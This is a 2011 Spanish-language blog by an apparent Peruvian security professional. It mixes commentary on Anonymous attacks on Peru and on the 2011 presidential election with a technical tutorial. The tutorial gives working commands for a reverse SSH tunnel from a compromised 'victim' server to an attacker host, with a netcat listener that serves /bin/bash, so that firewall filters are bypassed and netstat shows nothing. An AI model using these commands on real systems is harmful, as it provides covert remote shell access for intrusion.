Tuesday, June 28, 2011

Mas sobre Anonymous en Perú

Un comentario mio a una excelente nota escrita en ISSA Perú por Roberto Puyo
http://issaperu.org/?p=445#comment-40

Thursday, June 23, 2011

Técnico : SSH port forwarding triangulado

Necesito sacarme el clavo con esto de no bloggear hace tiempo algo técnico :

Uno de los problemas que deben enfrentar un atacante al establecer conexiones desde Internet es pasar por los filtros de entrada/salida impuestos por los firewalls.
Casi siempre encontramos que las conexiones de entrada a la red estan filtradas y, por ejemplo, un servidor web comprometido solo expone TCP 80 y si acaso, 443. Como tener un shell hacia ese equipo ?

La respuesta conocida desde hace años es que se debe establecer un shell reverso y para existen desde el venerable netcat hasta su versión moderna ncat y pasando por el querido MetaSploit. Algo que también se puede usar es reDuh y, por supuesto, ssh. Hay varias guías que indican como hacerlo, pero, no he encontrado una en Español latino (o no busque bien), asi que ahi va :

1. Se debe haber conseguido alguna forma de ejecución en el servidor victima, por ejemplo, mediante un RFI, un webshell, etc., pero, que no permiten la flexibilidad de una línea de comandos de shell.

2. En el server victima digitar algo como :
victima$ssh -p 31337 -f -N -R *:8081:localhost:8080 optimusprime@hacker.no-ip.org
Esto abre un socket en el puerto 8081 de hacker.no-ip.org
Al hacer un :
victima$ps agux | grep ssh
se podrá ver el proceso ejecutando, pero, aún algo como netstat no mostrará nada.
El objetivo es que al conectarse al puerto 8081 de hacker.no-ip.org, lo redireccionará hacia el 8080 de victima sobre el canal ya establecido.

3. Correr un servicio en el puerto 8080 de la victima para que reciba la conexión reversa como por ejemplo
victima$ nc -l -v -n -p 8080 -e /bin/bash
listening on [any] 8080 ..

4. En hacker.no-ip.org podremos ver el socket aperturado en 8081
hacker:~# netstat -nap
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
......................................................................................................................................
tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN 12060/sshd: optimusprime

5. Conectarse desde otro host al puerto 8081 de hacker.no-ip.org :
otro_host$nc -v hacker.no-ip.org 8081
Connection to hacker.no-ip.org 8081 port [tcp/tproxy] succeeded!
Aqui ya se pueden ejecutar comandos del shell, en este caso, tipo bash

6. En la victima se aprecia la conexión, no se requiere una conexión de entrada, no se generan nuevos procesos y toda la comunicación es encriptada :
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 47934

Saludos!

ADD : Verificar en /etc/ssh/sshd_config de hacker.no-ip.org, exista la linea :
GatewayPorts yes

Anonymous y Perú

Hoy día particularmente recibi varios llamados,correos, chats, etc. de consulta sobre la operación Andes Libres y la amenaza a Telefónica.

Es bien curioso como la gente se pone atenta cuando estas cosas llegan a los medios de prensa y entonces quieren hacer lo que nunca hicieron : ponerse en posición de defensa.
Como le respondi a una persona, no hay nada nuevo atras de estos ataques, las tecnicas usadas son las mismas de hace años y las vulnerabilidades son las de siempre. Entonces, el mantener seguros los activos de información no debería ser una cuestión circunstancial sino una postura continua.

Podría violar acuerdos de confidencialidad y divulgar todas las oportunidades en que contratados por entidades del gobierno para servicios de ethical hacking, hemos conseguido penetrar sus redes, pero, prefiero apuntar a quienes se erigen como representantes/miembros de Anonymous aca : http://www.piratasdelared.com/

Ayer me tome un momento para comprobar como podían haber violado la seguridad de un Ministerio local y es increíble como existían por lo menos 6 puntos de ataque sencillos. Eso demuestra que no estan seguros y los sitios que han adicionado luego lo corroboran.

Hoy veo que sale el Jefe de la ONGEI, Jaime Honores, a señalar que las entidades del gobierno se encuentran preparadas para el ataque. Este señor no solo demuestra ser un ignorante en esta materia sino que, ademas, demuestra como colocan personas sin capacidad para dirigir los destinos de la informática en el gobierno.
El seguramente cree que propiciar eventos de charlas y correrle herramientas automatizadas "con el apoyo de la empresa privada" es gestionar adecuadamente la seguridad de la información y seguridad informática. Claro, podrían decir que también existe un PeCERT, pero, saben que solo es un nombre y no es tangible.

También vi un "blogger" que salia a decir que Anonymous carecia de orden y organización y que los ataques no iban contra la data, que vea el site de Piratas de la Red pues. Otro neofito.

Para que servirá todo esto ? La verdad, servirá para que las entidades del gobierno compren mas hardware y software que ni saben que hace, pero, que si genera revenue para todos. También, contratarán consultorías con "empresas globales" y les pedirán que les hagan hackeos éticos, eso si : el personal debe ser ingeniero colegiado y tener certificaciones de seguridad de la información, no importa que no sepan ni un poco de hacking.
Resultado :falsa sensacion de seguridad, victimas voluntarias.

Es importante que se sepa que estos temas no atañen solo a tecnológos mas o menos capaces sino a temas de legislación. El otro día un amigo me pregunta : cuantos C|EH que sean ingenieros colegiados conoces ? Mi respuesta fue CERO y su pregunta era reflexiva porque el sabe la respuesta. Entonces, por que se pide esto : porque el Reglamente de Contrataciones y Adquisiciones del Estado Peruano indica que para labores de ingeniería, el personal debe ser titulado y colegiado.
De cerca de 16 C|EH en Perú, ninguno es ingeniero colegiado.
Eso requiere un cambio para poder tener organizaciones que se evaluen correctamente por personal adecuado.

En medio de todo esto hay actitudes hipócritas como las de los que se pelean por email y rajan de los demás, pero, en la foto siempre salen juntos y sonriendo. Y, también, hay actitudes valientes y honestas como la que vi hoy día de parte de un amigo (no diré su nombre por privacidad, pero, para darle una pista a el : MC) : rechazo participar en un proceso de contratacion de ethical hacking para una entidad del Estado porque analizó y determinó que el requerimiento estaba mal planteado y ello iba en contra de la calidad de servicio que merece una organización de nuestro país.

Quisiera no opinar sobre cosas como estas y seguir unicamente con temas técnicos, pero, lamentablemente, el medio que nos rodea debe limpiarse de hipócritas y gente interesada unicamente en llenarse los bolsillos a partir del tema de seguridad de la información y seguridad informática.

Monday, June 06, 2011

Sobre la CAIDA de la Bolsa de Valores de Lima despues de la eleccion de Humala

"La Bolsa de Valores de Lima es "asisito" respecto al valor de la produccion del Perú. Que se mueva esto fuerte no le hace mella al sector real de la produccion y el empleo en el Perú que es lo que le preocupa a la agente y en segundo lugar, los que participan en la bolsa, pero, no llegan ni al 0,1% de la poblacion peruana. De tal manera que al caer la bolsa afecta a una completa minoria. De tal manera que creo yo que tampoco hay que sobredimensionar esto, no? Hay que darle su importancia, si, porque afecta expectativas futuras, pero, tambien hay que decirle a la gente que a diferencia de otros paises desarrollados, aca que la bolsa caiga, su impacto, en lo que le preocupa a la gente que es su trabajo, su sueldo, su ingreso, la produccion...en el corto plazo, es casi, que no se siente." Jorge Gonzales Izquierdo, Economista. Fuente : 24 Horas, 6 de Junio del 2011. Panamericana Television.

Friday, June 03, 2011

Primer post del 2011 ? Elecciones 2011 Segunda Vuelta - Ollanta y Keiko

La verdad, me dedique mas a postear en el blog de Open-Sec aunque igual ha sido casi nada.
Me sobran temas tecnicos porque como siempre pienso : cuando alguien tecnico con blog deja de postear es porque anda con trabajo y eso me ha pasado.
Sin embargo, no puedo evitar usar este medio para manifestar mi opinion de este proceso electoral.

Debo iniciar parafraseando algo escuchado ultimamente : Toledo dijo que votar por Ollanta era un salto al vacio, creo que votar por Keiko es lanzarse de una de las torres del Centro Civico hacia el concreto.

Particularmente, mi ideologia politica siempre ha sido de corte socialista y, por ello, el hecho que Ollanta y Keiko sean los que pasen a la segunda vuelta ya es un triunfo ya que el Perú es más que Lima y mas que mi situacion economica-social-politica en particular. Es decir, elegir no pensando solo en "este me conviene y este no me conviene".

En los ultimos dos dias Ollanta ha sido acusado de todo lo que se pueda : sobornos para que salga librado de los juicios que tenia, pago de narcos en su epoca de militar, recibir dinero de Chavez y todo culminara el domingo con los tradicionales insultos a su esposa cuando vaya a votar.
Todo sin pruebas, claro, solamente la afirmacion de personas interesadas o de dudosa calaña.
Keiko dice que hay pruebas de sobornos para salir librado de juicios, donde estan las pruebas ?
Un tipo de mala calaña envio por dias a dos ancianos a la carcel con tan solo una declaracion y luego se demostro que mintio. Todo se dieron golpes de pecho. Ah! Pero, si un narco acusa a Ollanta, hay que creerle.
Un politico de US lo acusa de recibir dinero de Chavez y todos se olvidan de los Wikileaks que demostraron como los politicos en US se meten en las decisiones de otros paises. Es mas, demostraron como politicos locales acudieron al gobierno de US a pedir que impidan que gane Ollanta en el 2006 y, por ello, tuvimos la desgracia de tener un presidente como Alan Garcia.

Que tenemos por el lado de Keiko ?
Tiene una buena formacion academica fruto de la inversion hecha por nosotros los peruanos en sus estudios.
Uso el melodrama en el ultimo debate para decirnos que quiere hacer las cosas en forma diferente a su padre porque ella es madre. Detesto cuando las mujeres toman su genero para escudarse en el y , pero, aun cuando hacen uso de su condicion de madres y mas lamentable es que mencione a sus hijas para convencer a los votantes.
Se ha unido a PPK que dijo renuncio a su nacionalidad norteamericana y, en realidad, aun no hay pruebas que el tramite se haya completado. Imagino que al haber perdido estripitosamente en la primera vuelta, pidio que anulen el proceso ya que como ha dicho, sus principales ingresos vienen de US.
San Roman se une a Keiko, no importa que le patearon el trasero durante el gobierno de su padre.
Castañeda hizo la mayor publicidad de pocas obras publicas en toda la historia de Lima y los que circulamos por varios lugares de Lima, vemos que hizo muchisimo menos de lo dice.
Los demas, son relleno, pero, como sea, lo que demuestra es que Keiko se conviritio en la candidata de los perdedores de la primera vuelta. Es decir, lo que voten por ella, estaran votando por PPK y Castañeda. Votaran por los que no quieren que este pais cambie.
Ni siquiera le doy mucho al asunto de las torturas a su madre y la esterilizacion no voluntaria de miles de mujeres ante lo cual ella solo se quedo callada porque si reclamo, lo hizo en secreto.

Ollanta ha tenido el apoyo de muchos politicos y personalidades, pero, creo que no es lo mas relevante en este momento. Tal vez, rescataria el apoyo de Accion Popular, partido que nos dio a dos de los mejores presidentes de nuestro pais : Fernando Belaunde Terry y Valentin Paniagua.

Sin embargo, me da risa cuando los jovenes entusiastas, inexpertos y desinformados se sorprenden por estas alianzas. Por suerte, mi edad me ayuda a recordar historia pasada como cuando el APRA hizo coalicion con la Union Nacional Odriista en su afan por el poder.

Para alguien que vivio concientemente desde el gobierno de Velazco, como yo, es facil calificar al gobierno de Alberto Fujimori como el mejor y, principalmente, porque su labor permitio dar estabilidad economica al pais y retomar la seguridad ante el terrorismo (que ha vuelto a arreciar con el desastre de gobierno de Garcia desde el 2006). Por mi lado, la llegada de la tecnologia a Perú es lo que permitio nuestro actual avance.
En suma, se le debe mucho a Fujimori, si, ALBERTO FUJIMOR, pero, Keiko no es Alberto y no puede ser tan sirvenguenza de mostrar orgullo por el gobierno de su padre (como si ella hubiese hecho algo en ese momento como no sea estudiar en US) y, luego, deslindar su rol complaciente de "primer dama".
Todos sabemos que los votos que obtuvo en la primera vuelta no fueron por ella, mucha gente desinformada creia que votaba por Alberto Fujimori y otros por la esperanza que lo indulte.

Yo estoy seguro que si gana Keiko, como todo parece indicar, nada cambiara en el pais. Nada cambiara para los que deberia cambiar, para aquellos que mueren de frio en Puno, para aquellos que para ir al colegio deben cruzar el rio en un "deslizador" con sogas, para aquellos que mueren por desnutricion, para aquellos que no saben leer ni escribir, para aquellos que sufren la contaminacion dejada por las mineras, para aquellos que no tienen servicios de salud.
Claro, tampoco cambiara radicalmente para los "dueños" de este pais, solamente, seran mas poderosos.

Al final, si hago el analisis egoista, no me importa cual gane porque me tocara seguir trabajando como siempre, pero, como dije, el Perú es mucho mas grande que Lima.

Debo tambien analizar las propuestas. Creo que el principal error del plan de gobierno de Gana Perú fue ser una mixtura de plan de gobierno con ensayo politico. Pero, tambien creo que en nuestro pais se rehuye a ser directo, vivimos de la hipocresia constante. Nunca se dicen las cosas en la cara, se dicen a espaldas de las personas.
Sin embargo, a diferencia de lo que dijo Garcia, el territorio peruano es de los peruanos y nosotros determinamos que se hace aca o no. Osea, soy peruano para pagarle los impuestos a SUNAT, pero, no para pedir que sigan dañando nuestro territorio las mineras ?! Claro, como ningun twittero se traga el mercurio...
A ver, que vaya Garcia a decirle a los "propietarios" de Asia que ese pedazo de litoral peruano no es suyo...que vaya pues!
La inversion extranjera es importantisima, pero, que sea buena para todos. No se trata de inversion y nuevos empleos mal pagados. Que no inviertan aca porque se les deja hacer lo que les de la gana o porque la mano de obra es mas barata sino porque sera buena mano de obra.
Necesitamos ordenar el pais empezando por sus autoridades. El asunto de policias corruptos es tan malo como el de congresistas corruptos y ociosos : no se resuelve con subir sueldos sino con educacion con valores y controles efectivos.
La educacion no mejora solamente creando examenes para botar gente y remodelando los "colegios emblematicos" y la mejor prueba son todas las peleas callejeras con armas blancas que se han producido desde hace semanas en conocidos colegios limeños. Eso solo se resolveria con los profesores y autoridades educativas adecuadas.

Ante esta estupidez colectiva, lo positivo es que han surgido enfretamientos directos : los jovenes dicen lo que piensan y ellos son los que cambiaran este pais, pero, por favor informense. No sigan a lideres solo porque son "nice" o "cool" sino porque analizaron sus planteamientos e ideologia.
Un vocero de Keiko dijo que se necesitaba un gobierno pragmatico y no ideologico y me dio risa porque sono a "Keiko nos sirve porque no tiene ideas".

El tema es interminable y ya me toca seguir trabajando y ver a mi familia.

Ah! Me olvidaba, el Perú tambien es mas grande e importante que el presidente que tenga. Aun me afano porque las instituciones de mi pais obtengan buenos servicios de hacking asi no los haga mi equipo y, como varios de ellos pueden dar fe, lo hago aun asi no gane un centavo.
En otro aspecto, con mi esposa todos los dias inculcamos valores a nuestros hijos para que nuestro pais sea mejor.

Por esas razones, no importa si es Garcia el presidente o es Keiko u Ollanta, debemos apoyar las buenas acciones, controlar siempre y openernos a lo incorrecto MAS ALLA DE NUESTROS PROPIOS INTERESES.

Hasta la proxima que promete sera algo 100% tecnico, probablemente sobre lo ultimo novedoso que he venido haciendo que es hackeo de smartphones.